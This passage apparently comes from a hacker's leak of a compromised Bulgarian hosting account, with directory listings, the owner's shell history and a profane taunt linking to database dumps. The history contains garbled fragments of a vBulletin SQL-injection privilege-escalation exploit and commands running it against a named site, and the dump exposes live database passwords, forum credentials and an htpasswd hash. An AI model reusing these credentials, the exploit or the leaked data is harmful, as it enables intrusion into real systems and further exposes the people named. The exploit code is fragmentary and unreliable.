  825. 35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 public_html/
  826. 35898505 -rw-r--r-- 1 nopasara nopasara 23699498 Jan 18 2010 sverdlov.sql
  827. 35913892 drwxr-xr-x 2 nopasara nopasara 4096 May 20 2009 test/
  828. 35897350 drwxr-xr-x 7 nopasara nopasara 4096 Mar 4 11:07 tmp/
  829. 35897358 lrwxrwxrwx 1 nopasara nopasara 11 Dec 10 2008 www -> public_html/
  830. [email protected] [/home/nopasara/public_html]# ls -lia
  831. total 2286196
  832. 35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 ./
  833. 35897345 drwx--x--x 18 nopasara nopasara 4096 Mar 12 14:04 ../
  834. 35897364 -rw-r--r-- 1 nopasara nopasara 0 Feb 13 23:17 .htaccess
  835. 35967226 drwxr-xr-x 2 nopasara nopasara 4096 Jul 5 2009 _notes/
  836. 35897444 drwxr-xr-x 6 nopasara nopasara 4096 Jan 16 15:28 bgsecrets.com/
  837. 35947140 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 blog/
  838. 35947141 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 cdn/
  839. 37601282 drwxr-xr-x 2 nopasara nopasara 4096 Oct 4 18:47 cgi-bin/
  840. 35947142 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 cmdb/
  841. 35947139 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 crm/
  842. 36129979 drwxr-xr-x 10 nopasara nopasara 4096 Jan 12 2010 demo/
  843. 35930169 drwxr-xr-x 5 nopasara nopasara 4096 Mar 17 12:35 emeastudio/
  844. 35947143 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 eye/
  845. 35897426 -rw-r--r-- 1 nopasara nopasara 0 Feb 13 23:17 index.php
  846. 35980080 drwxr-xr-x 6 nopasara nopasara 4096 Jan 28 12:07 ioscompatible.com/
  847. 35897530 -rw-r--r-- 1 nopasara nopasara 2338684928 Feb 28 01:23 nfs.iso
  848. 37751973 drwxr-xr-x 3 nopasara nopasara 4096 Jan 6 21:24 png/
  849. 36094784 drwxr-xr-x 8 nopasara nopasara 4096 Mar 20 02:37 securityguy/
  850. 35948620 drwxr-xr-x 5 nopasara nopasara 4096 Mar 5 01:53 studioburgas/
  851. 36241410 drwxr-xr-x 8 nopasara nopasara 4096 Feb 6 15:19 sverdlov.net/
  852. 35964452 drwxr-xr-x 2 nopasara nopasara 4096 Jan 30 23:07 test/
  853. 35930404 drwxr-xr-x 5 nopasara nopasara 4096 Dec 29 21:25 topusahostingproviders.com/
  854. 35914083 drwxr-xr-x 3 nopasara nopasara 4096 Jan 7 01:53 tragedyworld.com/
  855. 35897467 drwxr-xr-x 6 nopasara nopasara 4096 Jan 6 21:25 web/
  856. 36144507 drwxr-xr-x 11 nopasara nopasara 4096 Jul 5 2010 wo/
  857. [email protected] [/home/nopasara/public_html/securityguy]# ls -lia
  858. total 5722468
  859. 36094784 drwxr-xr-x 8 nopasara nopasara 4096 Mar 20 02:37 ./
  860. 35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 ../
  861. 36094811 -rw------- 1 nopasara nopasara 16 Mar 7 01:54 .ftpquota
  862. 36094012 -rw-r--r-- 1 nopasara nopasara 3987 Mar 2 01:23 .htaccess
  863. 37093607 drwxr-xr-x 2 nopasara nopasara 4096 Jan 26 2010 cgi-bin/
  864. 36094022 -rw-r--r-- 1 nopasara nopasara 1468465152 Nov 21 2009 dni.avi
  865. 36094931 -rw-r--r-- 1 nopasara nopasara 397 Mar 2 01:21 index.php
  866. 37322753 drwxr-xr-x 7 nopasara nopasara 4096 Nov 9 2009 leech/
  867. 36094114 -rw-r--r-- 1 nopasara nopasara 15606 Mar 2 01:21 license.txt
  868. 36094164 -rw-r--r-- 1 nopasara nopasara 210 Jan 7 02:58 php.ini
  869. 36094115 -rw-r--r-- 1 nopasara nopasara 9200 Mar 2 01:21 readme.html
  870. 36094934 -rw-r--r-- 1 nopasara nopasara 27 Sep 27 2009 robots.txt
  871. 36094031 -rw-r--r-- 1 nopasara nopasara 388 Dec 1 2009 start.png
  872. 36978690 drwxr-xr-x 3 nopasara nopasara 4096 Dec 1 2009 task/
  873. 36094935 -rw-r--r-- 1 nopasara nopasara 5612818 Sep 27 2009 webtech_2009.tar.gz
  874. 36094061 -rw-r--r-- 1 nopasara nopasara 4337 Mar 2 01:21 wp-activate.php
  875. 36094786 drwxr-xr-x 9 nopasara nopasara 4096 Mar 2 01:21 wp-admin/
  876. 36095227 -rw-r--r-- 1 nopasara nopasara 40283 Mar 2 01:21 wp-app.php
  877. 36095228 -rw-r--r-- 1 nopasara nopasara 226 Mar 2 01:21 wp-atom.php
  878. 36095229 -rw-r--r-- 1 nopasara nopasara 274 Mar 2 01:21 wp-blog-header.php
  879. 36095230 -rw-r--r-- 1 nopasara nopasara 3931 Mar 2 01:21 wp-comments-post.php
  880. 36095231 -rw-r--r-- 1 nopasara nopasara 244 Mar 2 01:21 wp-commentsrss2.php
  881. 36095232 -rw-r--r-- 1 nopasara nopasara 3177 Mar 2 01:21 wp-config-sample.php
  882. 36095233 -rw-r--r-- 1 nopasara nopasara 1742 Mar 2 01:21 wp-config.php
  883. 36094792 drwxr-xr-x 7 nopasara nopasara 4096 Mar 2 01:25 wp-content/
  884. 36095718 -rw-r--r-- 1 nopasara nopasara 1255 Mar 2 01:21 wp-cron.php
  885. 36095719 -rw-r--r-- 1 nopasara nopasara 246 Mar 2 01:21 wp-feed.php
  886. 36094858 drwxr-xr-x 8 nopasara nopasara 4096 Mar 2 01:21 wp-includes/
  887. 36096099 -rw-r--r-- 1 nopasara nopasara 1997 Mar 2 01:21 wp-links-opml.php
  888. 36096100 -rw-r--r-- 1 nopasara nopasara 2453 Mar 2 01:21 wp-load.php
  889. 36096101 -rw-r--r-- 1 nopasara nopasara 27787 Mar 2 01:21 wp-login.php
  890. 36096102 -rw-r--r-- 1 nopasara nopasara 7774 Mar 2 01:21 wp-mail.php
  891. 36096103 -rw-r--r-- 1 nopasara nopasara 494 Mar 2 01:21 wp-pass.php
  892. 36094141 -rw-r--r-- 1 nopasara nopasara 110415 Mar 2 01:21 wp-pdf.php
  893. 36096104 -rw-r--r-- 1 nopasara nopasara 224 Mar 2 01:21 wp-rdf.php
  894. 36096105 -rw-r--r-- 1 nopasara nopasara 334 Mar 2 01:21 wp-register.php
  895. 36096106 -rw-r--r-- 1 nopasara nopasara 224 Mar 2 01:21 wp-rss.php
  896. 36096107 -rw-r--r-- 1 nopasara nopasara 226 Mar 2 01:21 wp-rss2.php
  897. 36096108 -rw-r--r-- 1 nopasara nopasara 9655 Mar 2 01:21 wp-settings.php
  898. 36094025 -rw-r--r-- 1 nopasara nopasara 18644 Mar 2 01:21 wp-signup.php
  899. 36096109 -rw-r--r-- 1 nopasara nopasara 3702 Mar 2 01:21 wp-trackback.php
  900. 36096110 -rw-r--r-- 1 nopasara nopasara 3210 Mar 2 01:21 xmlrpc.php
  901. 36094150 -rw-r--r-- 1 nopasara nopasara 4379590656 Sep 10 2010 xorred.iso
  902. [email protected] [/home/nopasara]# cat .bash_history
  903. #1263692240
  904. cd public_html/
  905. #1263692243
  906. test.php
  907. #1263692248
  908. php test.php
  909. #1263692260
  910. php test.php <?php
  911. #1263692260
  912. print_r('
  913. -----------------------------------------------------------------------------
  914. vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege
  915. escalation by session hijacking exploit
  916. by rgod
  917. mail: retrog at alice dot it
  918. site: http://retrogod.altervista.org
  919. Works regardless of php.ini settings, you need a Super Moderator account
  920. to copy posts among threads, to be launched while admin is logged in to
  921. the control panel, this will give you full admin privileges
  922. note: this will flood the forum with empty threads even!
  923. -----------------------------------------------------------------------------
  924. ');
  925. #1263692260
  926. if ($argc<7) {
  927. #1263692260
  928. print_r('
  929. -----------------------------------------------------------------------------
  930. Usage: php '.$argv[0].' host path user pass forumid postid OPTIONS
  931. host: target server (ip/hostname)
  932. path: path to vbulletin
  933. user/pass: you need a moderator account
  934. forumid: existing forum
  935. postid: existing post
  936. Options:
  937. -p[port]: specify a port other than 80
  938. -P[ip:port]: specify a proxy
  939. Example:
  940. php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80
  941. php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81
  942. -----------------------------------------------------------------------------
  943. ');
  944. #1263692260
  945. die;
  946. #1263692260
  947. }
  948. #1263692260
  949. /*
  950. #1263692260
  951. vulnerable code in inlinemod.php near lines 185-209:
  952. #1263692260
  953. ...
  954. #1263692260
  955. #1263692260
  956. ->GPC['postids']);
  957. #1263692260
  958. dex => $postid)
  959. #1263692260
  960. dex"] != intval($postid))
  961. {
  962. unset($postids["$index"]);
  963. }
  964. }
  965. if (empty($postids))
  966. {
  967. #1263692279
  968. php test.php
  969. #1263692305
  970. php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
  971. #1263692308
  972. php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
  973. #1263692321
  974. php test.php studiopress.com/support/ sverdlov sverdlovparola 42 15513
  975. #1263692381
  976. php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  977. #1263692470
  978. php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  979. #1263692489
  980. Administrator
  981. #1263692493
  982. Administrator
  983. #1263692496
  984. php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
  985. #1263692539
  986. cd ..
  987. #1263692540
  988. ls
  989. #1263692547
  990. rm .bash_history
  991. #1263692551
  992. cat .bash_h
  993. #1263692557
  994. exit
  995. #1263831540
  996. mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov.sql
  997. #1263831932
  998. mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov1.sql
  999. #1263833103
  1000. exit
  1001. #1263832465
  1002. ls -la
  1003. #1263832469
  1004. ls -la
  1005. #1263832491
  1006. vim .bash_history
  1007. #1263832552
  1008. mysql -h 127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < sverdlov.sql
  1009. #1263832751
  1010. mysql --help|grep charset
  1011. #1263832754
  1012. mysql --help|grep char
  1013. #1263832908
  1014. cd public_html/
  1015. #1263832909
  1016. ls
  1017. #1263832912
  1018. cd sverdlov.net/
  1019. #1263832912
  1020. ls
  1021. #1263832923
  1022. vim wp-config.php
  1023. #1263837320
  1024. logou
  1025. #1263837322
  1026. logout
  1027. uname -a;w;id
  1028. cd /home/nopasara
  1029. ls -l
  1030. du -hs .
  1031. cd /home/nopasara
  1032. ls -lia
  1033. >> LOL, You're doing it wrong, idiot.
  1034. [email protected] [/home/nopasara/.htpasswds/public_html/securityguy/leech]# cat passwd
  1035. leech:204VnKl0pmERM
  1036. [email protected] [/home/nopasara]# ls -l docs
  1037. total 36044
  1038. drwxr-xr-x 2 nopasara nopasara 4096 Apr 12 2009 ./
  1039. drwx--x--x 18 nopasara nopasara 4096 Mar 20 03:01 ../
  1040. -rw-r--r-- 1 nopasara nopasara 1589323 Apr 12 2009 NIST-SP800-42.pdf
  1041. -rw------- 1 nopasara nopasara 1224696 Jan 14 2009 auditing_mac_os_x_compliance_with_the_center_for_internet_security_benchmark_using_nessus_32948
  1042. -rw------- 1 nopasara nopasara 925291 Jan 14 2009 cleaning_up_the_back_yard_a_discussion_on_your_mothers_home_network_security_32933
  1043. -rw------- 1 nopasara nopasara 903941 Jan 14 2009 covering_the_tracks_on_mac_os_x_leopard_32993
  1044. -rw------- 1 nopasara nopasara 1000759 Jan 14 2009 current_issues_in_dns_32988
  1045. -rw------- 1 nopasara nopasara 883280 Jan 14 2009 data_carving_concepts_32969
  1046. -rw------- 1 nopasara nopasara 504518 Jan 14 2009 detecting_and_preventing_anonymous_proxy_usage_32943
  1047. -rw------- 1 nopasara nopasara 1856536 Jan 14 2009 document_metadata_the_silent_killer_32974
  1048. -rw------- 1 nopasara nopasara 3193150 Jan 14 2009 era_of_spybots_a_secure_design_solution_using_intrusion_prevention_systems_32928
  1049. -rw------- 1 nopasara nopasara 825947 Jan 14 2009 evtx_and_windows_event_logging_32949
  1050. -rw------- 1 nopasara nopasara 6815322 Jan 14 2009 fibre_channel_storage_area_networks_an_analysis_from_a_security_perspective_32913
  1051. -rw------- 1 nopasara nopasara 2014858 Jan 14 2009 human_being_firewall_32998
  1052. -rw------- 1 nopasara nopasara 631031 Jan 14 2009 intel_ixp_network_processor_based_intrusion_detection_32919
  1053. -rw------- 1 nopasara nopasara 343988 Jan 14 2009 intrusion_detection_likelihood_a_riskbased_approach_32938
  1054. -rw------- 1 nopasara nopasara 516554 Jan 14 2009 iosmap_tcp_and_udp_port_scanning_on_cisco_ios_platforms_32964
  1055. -rw------- 1 nopasara nopasara 426055 Jan 14 2009 manager_bg_2009.pdf
  1056. -rw------- 1 nopasara nopasara 461473 Jan 14 2009 mining_for_malware_theres_gold_in_them_thar_proxy_logs_32959
  1057. -rw------- 1 nopasara nopasara 808979 Jan 14 2009 net_framework_rootkits_backdoors_inside_your_framework_32954
  1058. -rw------- 1 nopasara nopasara 981363 Jan 14 2009 os_and_application_fingerprinting_techniques_32923
  1059. -rw------- 1 nopasara nopasara 1083363 Jan 14 2009 paper32988.pdf
  1060. -rw------- 1 nopasara nopasara 1574638 Jan 14 2009 security_considerations_for_avaya_ess_implementation_32984
  1061. -rw------- 1 nopasara nopasara 485204 Jan 14 2009 security_incident_handling_in_small_organizations_32979
  1062. -rw------- 1 nopasara nopasara 482489 Jan 14 2009 skype_a_practical_security_analysis_32918
  1063. -rw------- 1 nopasara nopasara 470634 Jan 14 2009 social_engineering_manipulating_the_source_32914
  1064. -rw------- 1 nopasara nopasara 732651 Jan 14 2009 the_importance_of_security_awareness_training_33013
  1065. -rw------- 1 nopasara nopasara 1143981 Jan 14 2009 transparent_layer_2_firewalls_a_look_at_2_vendor_offerings_juniper_and_cisco_32978
  1066. -rw------- 1 nopasara nopasara 4844265 Jan 14 2009 valsmith_dquist_hacking_malware.pdf
  1067. [email protected] [/home/nopasara]# ls -l /usr/local/apache/domlogs/nopasara/
  1068. total 128288
  1069. drwxr-x--- 2 root nopasara 4096 Feb 28 14:26 ./
  1070. drwx--x--x 654 root wheel 765952 Mar 20 03:03 ../
  1071. -rw-r----- 2 root nopasara 39096 Mar 20 01:19 bgsecrets.oss.bg
  1072. -rw-r----- 2 root nopasara 294111 Jul 10 2009 blog.nopasara.bg
  1073. -rw-r----- 2 root nopasara 6791 Mar 16 21:06 blog.oss.bg
  1074. -rw-r----- 2 root nopasara 15280 Mar 16 21:22 cdn.oss.bg
  1075. -rw-r----- 2 root nopasara 927221 Jul 4 2009 cmdb.nopasara.bg
  1076. -rw-r----- 2 root nopasara 0 Jan 31 2010 cmdb.oss.bg
  1077. -rw-r----- 2 root nopasara 227423 Jul 4 2009 crm.nopasara.bg
  1078. -rw-r----- 2 root nopasara 0 Jan 31 2010 crm.oss.bg
  1079. -rw-r----- 2 root nopasara 101328 Mar 20 02:10 demo.oss.bg
  1080. -rw-r----- 2 root nopasara 2399652 Mar 20 01:57 emeastudio.oss.bg
  1081. -rw-r----- 2 root nopasara 0 Jan 31 00:25 eye.oss.bg
  1082. -rw-r----- 2 root nopasara 0 Aug 31 2009 ftp.nopasara.bg-ftp_log
  1083. -rw-r----- 2 root nopasara 111685373 Mar 17 12:56 ftp.oss.bg-ftp_log
  1084. -rw-r----- 2 root nopasara 29481 Dec 28 2009 hipopotuk.oss.bg
  1085. -rw-r----- 2 root nopasara 80008 Mar 20 01:44 ioscompatible.oss.bg
  1086. -rw-r----- 2 root nopasara 121645 Oct 3 13:24 logostudio.oss.bg
  1087. -rw-r----- 2 root nopasara 0 Aug 31 2009 nopasara.bg
  1088. -rw-r----- 2 root nopasara 39153 Sep 16 2009 nopasara.oss.bg
  1089. -rw-r----- 2 root nopasara 0 Dec 10 2008 nopasaran.bg
  1090. -rw-r----- 2 root nopasara 259906 Mar 20 02:54 oss.bg
  1091. -rw-r----- 2 root nopasara 104114 Feb 5 11:21 osseu.oss.bg
  1092. -rw-r----- 2 root nopasara 0 Jun 30 2009 play.nopasara.bg
  1093. -rw-r----- 2 root nopasara 0 Jul 10 2009 play.oss.bg
  1094. -rw-r----- 2 root nopasara 10374402 Mar 20 03:02 securityguy.oss.bg
  1095. -rw-r--r-- 2 root root 375448 Jul 28 2009 studio.oss.bg
  1096. -rw-r----- 2 root nopasara 74486 Mar 19 20:47 studioburgas.oss.bg
  1097. -rw-r----- 2 root nopasara 729044 Jul 4 2009 support.nopasara.bg
  1098. -rw-r----- 2 root nopasara 0 Jul 10 2009 support.oss.bg
  1099. -rw-r----- 2 root nopasara 2114965 Mar 20 02:54 sverdlov.oss.bg
  1100. -rw-r----- 2 root nopasara 72848 Mar 20 02:42 test.oss.bg
  1101. -rw-r----- 2 root nopasara 0 Jan 31 00:25 topusahostingproviders.oss.bg
  1102. -rw-r----- 2 root nopasara 0 Jan 31 00:25 tragedyworld.oss.bg
  1103. -rw-r----- 2 root nopasara 141532 Mar 20 02:53 web.oss.bg
  1104. -rw-r----- 2 root nopasara 140 Aug 1 2009 weboffice.oss.bg
  1105. -rw-r----- 2 root nopasara 137076 Mar 16 02:38 wo.oss.bg
  1106. >> Check the URL for database dumps, etc.
  1107. Fuck the skiddies, fuck the pseudo-security experts like Sverdlov, and last but not least.. fuck the cops and the stupid journalists brainwashing the innocent.
  1108. Here's the URL for the various dumps -
  1109. http://www.4shared.com/file/sy8bdPe5/pwnt4phun.html
  1110. Get back to [email protected] for non-published details, packet captures, some more database dumps, etc.